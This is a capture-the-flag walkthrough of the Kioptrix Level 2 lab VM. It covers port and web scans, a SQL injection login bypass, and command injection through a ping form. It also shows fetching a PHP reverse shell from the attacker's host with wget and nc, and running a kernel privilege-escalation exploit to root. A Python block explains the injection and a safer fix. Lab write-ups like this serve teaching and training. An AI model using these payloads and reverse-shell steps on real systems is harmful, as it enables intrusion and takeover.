# Lab setup
Copying the VM over as-is does not work out of the box.
I added a network adapter in NAT mode. On boot the VM prompts for network configuration; select DHCP with the space bar and save.
It then comes up on the VM network.
IP address: 192.168.74.134
# Information gathering
# nmap
# Full port scan
```text
┌──(root㉿kali)-[~/Desktop]
└─# nmap -p- 192.168.74.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-06 02:42 EDT
Nmap scan report for 192.168.74.134
Host is up (0.00056s latency).
Not shown: 65528 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
631/tcp  open  ipp
911/tcp  open  xact-backup
3306/tcp open  mysql
MAC Address: 00:0C:29:E9:5F:E5 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 6.59 seconds
```
# Service and OS detection
```text
┌──(root㉿kali)-[~/Desktop]
└─# nmap -A 192.168.74.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-06 02:30 EDT
Nmap scan report for 192.168.74.134
Host is up (0.00081s latency).
Not shown: 993 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey:
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.0.52 (CentOS)
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2          111/tcp     rpcbind
|   100000  2          111/udp     rpcbind
|   100024  1          908/udp     status
|_  100024  1          911/tcp     status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|_    SSL2_RC2_128_CBC_WITH_MD5
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
|_ssl-date: 2024-04-06T03:21:24+00:00; -3h09m42s from scanner time.
|_http-server-header: Apache/2.0.52 (CentOS)
631/tcp  open  ipp      CUPS 1.1
|_http-title: 403 Forbidden
| http-methods:
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
911/tcp  open  status   1 (RPC #100024)
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:E9:5F:E5 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

Host script results:
|_clock-skew: -3h09m42s

TRACEROUTE
HOP RTT     ADDRESS
1   0.81 ms 192.168.74.134

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.60 seconds
```
Takeaways from this scan: OpenSSH 3.9p1 still negotiates SSHv1, Apache 2.0.52 on a 2.6.9-era kernel, SSLv2 with export-grade ciphers on 443 behind a certificate that expired in 2010, CUPS 1.1 advertising PUT, and a MySQL on 3306 that refuses this client host ("unauthorized"). The web service is the obvious way in.
# nikto
```text
┌──(root㉿kali)-[~/Desktop]
└─# nikto -h 192.168.74.134
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.74.134
+ Target Hostname:    192.168.74.134
+ Target Port:        80
+ Start Time:         2024-04-06 02:32:45 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.0.52 (CentOS)
+ /: Retrieved x-powered-by header: PHP/4.3.9.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ Apache/2.0.52 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE .
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /manual/: Uncommon header 'tcn' found, with contents: choice.
+ /manual/: Web server manual found.
+ /icons/: Directory indexing found.
+ /manual/images/: Directory indexing found.
+ /icons/README: Server may leak inodes via ETags, header found with file /icons/README, inode: 357810, size: 4872, mtime: Sat Mar 29 13:41:04 1980. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8909 requests: 1 error(s) and 17 item(s) reported on remote host
+ End Time:           2024-04-06 02:33:39 (GMT-4) (54 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```
# dirsearch
```text
D:\PentestTool\Pentest_ToolBox\Gather_Infomation\dirsearch>dirsearch -u http://192.168.74.134/
dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict
dirsearch v0.4.3

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: D:\PentestTool\Pentest_ToolBox\Gather_Infomation\dirsearch\reports\http_192.168.74.134\__24-04-06_14-33-05.txt

Target: http://192.168.74.134/

[14:33:05] Starting:
[14:33:10] 403 -  293B  - /.ht_wsr.txt
[14:33:10] 403 -  296B  - /.htaccess.bak1
[14:33:10] 403 -  296B  - /.htaccess.save
[14:33:10] 403 -  296B  - /.htaccess.orig
[14:33:10] 403 -  298B  - /.htaccess.sample
[14:33:10] 403 -  297B  - /.htaccess_extra
[14:33:10] 403 -  296B  - /.htaccess_orig
[14:33:10] 403 -  294B  - /.htaccessBAK
[14:33:10] 403 -  294B  - /.htaccess_sc
[14:33:10] 403 -  294B  - /.htaccessOLD
[14:33:10] 403 -  286B  - /.htm
[14:33:10] 403 -  287B  - /.html
[14:33:10] 403 -  295B  - /.htaccessOLD2
[14:33:10] 403 -  296B  - /.htpasswd_test
[14:33:10] 403 -  292B  - /.htpasswds
[14:33:10] 403 -  293B  - /.httr-oauth
[14:33:54] 403 -  290B  - /cgi-bin/
[14:34:11] 403 -  288B  - /error/
[14:34:34] 301 -  317B  - /manual  ->  http://192.168.74.134/manual/
[14:34:34] 200 -    7KB - /manual/index.html
[14:35:22] 403 -  287B  - /usage

Task Completed
```
Nothing useful from the brute force; the home page itself is a login form. I tried some SQL injection on it more or less at random and walked straight in. Speechless.
# Exploitation
# Web page
The login form is injectable; the classic "universal password" payload goes straight in:
```text
btnLogin=Login&psw=admin' or '1'='1&uname=admin
```
The value of `psw` closes the string literal in the password comparison and appends `or '1'='1`, so the WHERE clause matches every row and the first user is logged in.
Once logged in, the page is a ping form whose input is handed to a shell command: the usual story.
Appending a `;` is all it takes to break out.
Enter `127.0.0.1;ls -al`, click submit, and the result comes back:
```text
127.0.0.1;ls -al
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.012 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.020 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.022 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1999ms
rtt min/avg/max/mdev = 0.012/0.018/0.022/0.004 ms, pipe 2
total 24
drwxr-xr-x  2 root root 4096 Oct  8  2009 .
drwxr-xr-x  8 root root 4096 Oct  7  2009 ..
-rwxr-Sr-t  1 root root 1733 Feb  9  2012 index.php
-rwxr-Sr-t  1 root root  199 Oct  8  2009 pingit.php
```
Everything here is owned by root and only world-readable, so we can read but not write in this directory.
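The ping form behaves like the textbook `shell_exec("ping -c 3 " . $_POST[...])` pattern. The Python below is an added example, not code from this write-up or from the Kioptrix VM; pingit.php's source is not shown above, so the exact command shape is an assumption. It renders the vulnerable command string, tokenizes it the way a POSIX shell would so the `;` and `&&` payloads used in this write-up visibly become a second command, and contrasts that with a builder that only accepts an IP literal and passes it as a single argv element with no shell in the path.

```python
import ipaddress
import shlex
import subprocess

# Assumed shape of the target's pingit.php call (its source is not in the
# write-up): the form value is glued straight onto a shell command string.
PING_PREFIX = "ping -c 3 "


def vulnerable_ping_command(target):
    """Build the command the way an unsafe `shell_exec("ping -c 3 " . $ip)` would."""
    return PING_PREFIX + target


def shell_commands(cmd):
    """Tokenize `cmd` as /bin/sh would and split it at command separators.

    Returns one argv list per command, so an injected `;ls -al` or
    `&& wget ...` shows up as a second, independent command.
    """
    lex = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lex.whitespace_split = True  # keep words like 192.168.74.129:38856 intact
    commands, current = [], []
    for tok in lex:
        if tok in (";", "&&", "||", "|", "&"):
            commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def build_ping_argv(target):
    """Hardened form: accept only an IP literal and never involve a shell."""
    try:
        ip = ipaddress.ip_address(target.strip())
    except ValueError:
        raise ValueError(f"rejected ping target: {target!r}") from None
    return ["ping", "-c", "3", str(ip)]


def run_ping(target):
    """Run the validated command; argv is a list, so nothing re-parses it."""
    proc = subprocess.run(build_ping_argv(target), capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    # The two payloads used against the form in this write-up.
    for payload in ("127.0.0.1;ls -al",
                    "127.0.0.1 && wget 192.168.74.129:38856 -O /tmp/rshell.php"):
        print(shell_commands(vulnerable_ping_command(payload)))
        try:
            build_ping_argv(payload)
        except ValueError as err:
            print(err)
```

The split shows why `;` works: the shell sees `ping -c 3 127.0.0.1` and `ls -al` as two commands and runs both. The fix is not to blacklist `;` but to stop building a shell string at all: validate the value as an address and pass it as one argv element.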
Dump index.php with `127.0.0.1;cat index.php` and look at the page source: it contains the database user, password and database name.
```php
<?php
mysql_connect("localhost", "john", "hiroshima") or die(mysql_error());
//print "Connected to MySQL<br />";
mysql_select_db("webapp");
if ($_POST['uname'] != ""){
    $username = $_POST['uname'];   // taken straight from the form, no escaping
    $password = $_POST['psw'];
    // both values are interpolated into the SQL text: this is the injection point
    $query = "SELECT * FROM users WHERE username = '$username' AND password='$password'";
    //print $query."<br />";
    $result = mysql_query($query);
    $row = mysql_fetch_array($result);
    //print "ID: ".$row['id']."<br />";
}
?>
```
- Username: john
- Password: hiroshima
- Database: webapp
I tried connecting with these, but there's a host whitelist on the account, so no luck.
Anyway, we need a shell.
The current directory is /var/www/html, which only root can write to, so we have to work somewhere else. /tmp it is: drop a reverse shell there, then listen from Kali.
# Prepare the PHP reverse shell
```text
┌──(root㉿kali)-[~/Desktop]
└─# mysql -h 192.168.74.134 -u john
ERROR 1130 (HY000): Host '192.168.74.129' is not allowed to connect to this MySQL server

┌──(root㉿kali)-[~/Desktop]
└─# php-reverse-shell
php-reverse-shell: command not found

┌──(root㉿kali)-[~/Desktop]
└─# cp /usr/share/webshells/php/php-reverse-shell.php /root/Desktop/shell.php

┌──(root㉿kali)-[~/Desktop]
└─# vim shell.php
```
ERROR 1130 is the MySQL grant table doing its job: the user's host part does not match 192.168.74.129, so the account is only usable from the box itself (the web app connects to `localhost`). In shell.php, set `$ip` and `$port` to the Kali address and the port you will listen on (192.168.74.129 and 1234 here).
# Serve the file and listen
```text
┌──(root㉿kali)-[~/Desktop]
└─# cat shell.php| nc -l -p 38856
```
Send the payload through the ping form: `127.0.0.1 && wget 192.168.74.129:38856 -O /tmp/rshell.php`
`nc -l` answers the first connection and then exits, so each transfer needs its own listener. With the backdoor in place, start the listener for the reverse shell:
```text
┌──(root㉿kali)-[~/Desktop]
└─# nc -lnvp 1234
```
Send the payload: `127.0.0.1 && php /tmp/rshell.php`
```text
┌──(root㉿kali)-[~/Desktop]
└─# nc -lnvp 1234
listening on [any] 1234 ...
connect to [192.168.74.129] from (UNKNOWN) [192.168.74.134] 32770
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux
 00:15:56 up 59 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-3.00$ whoami
apache
```
That gives a shell as the apache user; the next step is privilege escalation.
I first tried escalating with metasploit: listened with the payload/cmd/unix/reverse_bash module, used the shell I already had to throw a fresh shell back into metasploit, and ran post/multi/recon/local_exploit_suggester to look for usable privesc modules.
```text
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.74.134 - Collecting local exploits for cmd/unix...
[*] 192.168.74.134 - 190 exploit checks are being tried...
[+] 192.168.74.134 - exploit/openbsd/local/dynamic_loader_chpass_privesc: The service is running, but could not be validated. Patch 013_ldso is not present
[*] Running check method for exploit 20 / 20
[*] 192.168.74.134 - Valid modules for session 2:
============================

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/openbsd/local/dynamic_loader_chpass_privesc            Yes                      The service is running, but could not be validated. Patch 013_ldso is not present
 2   exploit/aix/local/ibstat_path                                  No                       The target is not exploitable. /usr/bin/ibstat is not set-uid root
 3   exploit/aix/local/invscout_rpm_priv_esc                        No                       The target is not exploitable. /usr/sbin/invscout is not executable
 4   exploit/aix/local/xorg_x11_server                              No                       The check raised an exception.
 5   exploit/linux/local/cve_2021_38648_omigod                      No                       The target is not exploitable. The omiserver process was not found.
 6   exploit/linux/local/pihole_remove_commands_lpe                 No                       The target is not exploitable. Pi-Hole version 0 is >= 5.3 and not vulnerable
 7   exploit/linux/local/vmware_workspace_one_access_certproxy_lpe  No                       The target is not exploitable. Not running as the horizon user.
 8   exploit/linux/local/vmware_workspace_one_access_cve_2022_22960 No                       The target is not exploitable. Not running as the horizon user.
 9   exploit/linux/local/zpanel_zsudo                               No                       The target is not exploitable.
 10  exploit/linux/local/zyxel_suid_cp_lpe                          No                       The target is not exploitable. Could not read /zyinit/fwversion. The target is not a Zyxel firewall.
 11  exploit/multi/local/vagrant_synced_folder_vagrantfile_breakout No                       The check raised an exception.
 12  exploit/multi/local/xorg_x11_suid_server                       No                       The target is not exploitable.
 13  exploit/osx/local/feedback_assistant_root                      No                       The check raised an exception.
 14  exploit/osx/local/sudo_password_bypass                         No                       The target is not exploitable.
 15  exploit/qnx/local/ifwatchd_priv_esc                            No                       The check raised an exception.
 16  exploit/solaris/local/xscreensaver_log_priv_esc                No                       The check raised an exception.
 17  exploit/unix/local/chkrootkit                                  No                       The target is not exploitable.
 18  exploit/unix/local/emacs_movemail                              No                       The target is not exploitable.
 19  exploit/unix/local/exim_perl_startup                           No                       The target is not exploitable.
 20  exploit/unix/local/setuid_nmap                                 No                       The target is not exploitable. /usr/bin/nmap is not setuid
```
One candidate shows up.
But! I ran it, and it doesn't work.
```text
msf6 exploit(openbsd/local/dynamic_loader_chpass_privesc) > run
[*] Started reverse TCP double handler on 192.168.74.129:8888
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Patch 013_ldso is not present
[!] Could not determine libutil.so name. Using: libutil.so.12.1, libutil.so.13.1
[*] Writing '/tmp/.Xg7bSmDg.c' (316 bytes) ...
[*] Compiling /tmp/libutil.so.12.1 ...
[-] /tmp/.Xg7bSmDg.c: In function `_init':
/tmp/.Xg7bSmDg.c:7: error: `_PATH_KSHELL' undeclared (first use in this function)
/tmp/.Xg7bSmDg.c:7: error: (Each undeclared identifier is reported only once
/tmp/.Xg7bSmDg.c:7: error: for each function it appears in.)
/tmp/.Xg7bSmDg.c:7: error: syntax error before string constant
[-] Exploit aborted due to failure: unknown: /tmp/libutil.so.12.1.c failed to compile
[*] Exploit completed, but no session was created.
```
The compile fails; I'm puzzled by this, so if anyone knows, give me a shout.
So instead, let's check searchsploit for a privilege escalation.
```text
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit centos 4.5
------------------------------------------------------------------------------------------------------------------------------------------ -------------------------
 Exploit Title                                                                                                                            |  Path
------------------------------------------------------------------------------------------------------------------------------------------ -------------------------
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5)     | linux/local/9479.c
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)      | linux_x86/local/9542.c
Linux Kernel 3.14.5 (CentOS 7 / RHEL) - 'libfutex' Local Privilege Escalation                                                             | linux/local/35370.c
------------------------------------------------------------------------------------------------------------------------------------------ -------------------------
Shellcodes: No Results
Papers: No Results
```
The middle one matches our target exactly (kernel 2.6.9 on CentOS 4, x86, as the uname output above showed). Pull it out, push it over with the same nc trick, compile it on the box, and pwn.
```text
┌──(root㉿kali)-[~/Desktop]
└─# cat 9542.c| nc -lp 9999
```
Submit through the ping form: `127.0.0.1 && wget 192.168.74.129:9999 -O /tmp/pwn.c`
Once it's uploaded, compile and run it from the shell we already have:
```text
sh-3.00$ gcc -o /tmp/pwn /tmp/pwn.c
/tmp/pwn.c:109:28: warning: no newline at end of file
sh-3.00$ /tmp/pwn
sh: no job control in this shell
sh-3.00# whoami
root
```
Root obtained.